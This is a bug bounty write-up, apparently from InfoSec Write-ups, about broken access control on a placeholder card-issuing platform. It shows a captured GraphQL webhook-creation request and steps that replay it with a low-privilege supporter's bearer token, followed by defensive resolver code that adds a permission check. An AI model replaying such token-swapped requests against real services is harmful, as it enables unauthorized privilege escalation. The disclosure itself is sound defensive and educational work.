$500 Access Control Bug: Performed Restricted Actions in Developer Settings as a Low-Level User
2024-2-25 14:52:25 Author: infosecwriteups.com Views: 16

Abhi Sharma

InfoSec Write-ups

Recently, I found an interesting bug during my testing that lets a supporter carry out restricted actions within the developer settings, specifically tweaking notifications without proper authorization, in a private program. This issue sheds light on a loophole where a low-level actor or a restricted supporter can manipulate the application’s logic.

Understanding Target

ExamNote (a placeholder name for the bug bounty program) is a comprehensive platform designed to prioritize customer needs by offering an all-in-one solution for modern card issuer processing and program management. It empowers businesses to efficiently build and launch new revenue streams, providing a seamless experience for both businesses and their customers. In this context, the bug that allows unauthorized actions in the developer settings poses a potential risk.

The Bug

The bug I discovered in ExamNote is a flaw that enables a supporter or other low-level actor to perform restricted actions in the developer settings. Specifically, it allows such a user to change notifications without the necessary permissions.

This issue is significant because a user with lower privileges, such as a supporter, can manipulate the application’s logic by creating notifications in the admin developer settings even though they lack the required permissions.

Before we move on, if you like my write-ups, please support me by liking, sharing, and clapping up to 50 times here on Medium; it’s free. Thank you.

Steps To Reproduce:

  1. Use the admin account to create a notification.
  2. Capture the request made during the notification creation process and drop the request.
  3. Switch to the supporter or user account and capture any request made.

```http
POST /graphql HTTP/2
Host: api.us.test.examnote.com
Authorization: Bearer ------------

{"query":"mutation AddWebhookNotificationTarget($input: AddWebhookNotificationTargetInput!) {\n addWebhookNotificationTarget(input: $input) {\n __typename\n ... on WebhookNotificationTarget {\n id\n signingKeys {\n createdAt\n id\n secret\n }\n }\n ... on UserError {\n errors {\n path\n code\n description\n }\n }\n }\n}","variables":{"input":{"name":"hello","uri":"https://test.com","subscriptions":["ACH_EXTERNALLY_INITIATED_DEPOSIT_RECEIVED","ACH_EXTERNALLY_INITIATED_DEPOSIT_PROCESSED"]}}}
```

  4. Change the Authorization: Bearer token in the captured notification-setting request to the Authorization: Bearer token of the user/supporter (attacker) account.
  5. Send the modified request.
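As an added illustration (not ExamNote’s code), here is what the missing server-side check looks like for the addWebhookNotificationTarget mutation in the captured request: a resolver that only authenticates the bearer token, beside one that also enforces a developer-settings permission before writing anything. The session table, role names and permission string are constructed assumptions.

```javascript
// Added example, not ExamNote's code. Resolvers are written in the plain
// (input, context) style of a GraphQL server; the session table, role names
// and permission string are constructed for illustration.

// Constructed session table: bearer token -> principal. A real service would
// verify the token (signature, expiry) and load roles from its identity store.
const SESSIONS = {
  'admin-token': { id: 'u1', roles: ['admin'] },
  'supporter-token': { id: 'u2', roles: ['supporter'] },
};

// Only the admin role may write developer settings (webhook notification targets).
const ROLE_PERMISSIONS = {
  admin: new Set(['developer_settings:write']),
  supporter: new Set(['tickets:read']),
};

function principalFromToken(bearer) {
  return SESSIONS[bearer] || null;
}

function hasPermission(principal, perm) {
  return principal.roles.some((r) => (ROLE_PERMISSIONS[r] || new Set()).has(perm));
}

// Vulnerable resolver: authenticates the caller but never checks that this
// principal may modify developer settings, so any valid bearer token succeeds.
function addWebhookNotificationTargetVulnerable(input, ctx) {
  const principal = principalFromToken(ctx.bearer);
  if (!principal) throw new Error('unauthenticated');
  return { __typename: 'WebhookNotificationTarget', id: 'wnt_1', name: input.name };
}

// Hardened resolver: the permission check runs before any state change, and a
// denial comes back in the API's own UserError shape (path / code / description)
// rather than silently succeeding.
function addWebhookNotificationTarget(input, ctx) {
  const principal = principalFromToken(ctx.bearer);
  if (!principal) throw new Error('unauthenticated');
  if (!hasPermission(principal, 'developer_settings:write')) {
    return {
      __typename: 'UserError',
      errors: [{ path: ['input'], code: 'FORBIDDEN',
                 description: 'caller may not modify developer settings' }],
    };
  }
  return { __typename: 'WebhookNotificationTarget', id: 'wnt_1', name: input.name };
}
```

The key property is that authorization is decided per mutation from the principal behind the token, so replaying an admin-shaped request with a supporter token is denied by the hardened resolver.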

The Bounty

The security vulnerability I identified in ExamNote was deemed significant, and as a recognition of its severity, the company awarded a bounty of $500 for the report. This underlines the importance placed on maintaining the integrity and security of their platform.

Takeaway

This discovery highlights the critical need for robust security measures in applications like ExamNote. The lesson here is clear: even seemingly minor issues can pose a substantial threat to a platform’s functionality and security. It emphasizes the importance of continuous vigilance from both security researchers and developers to ensure a resilient and secure user experience.

Leave some claps if you enjoyed this read, leave your feedback in the comments, and consider following me for more exciting findings.

Find me on Twitter: @a13h1_

Keep Supporting, Keep Clapping, Keep Commenting.


Article source: https://infosecwriteups.com/500-access-control-bug-performed-restricted-actions-in-developer-settings-by-low-level-user-b4ecaa6d1aa1?source=rss----7b722bfd1b8d--bug_bounty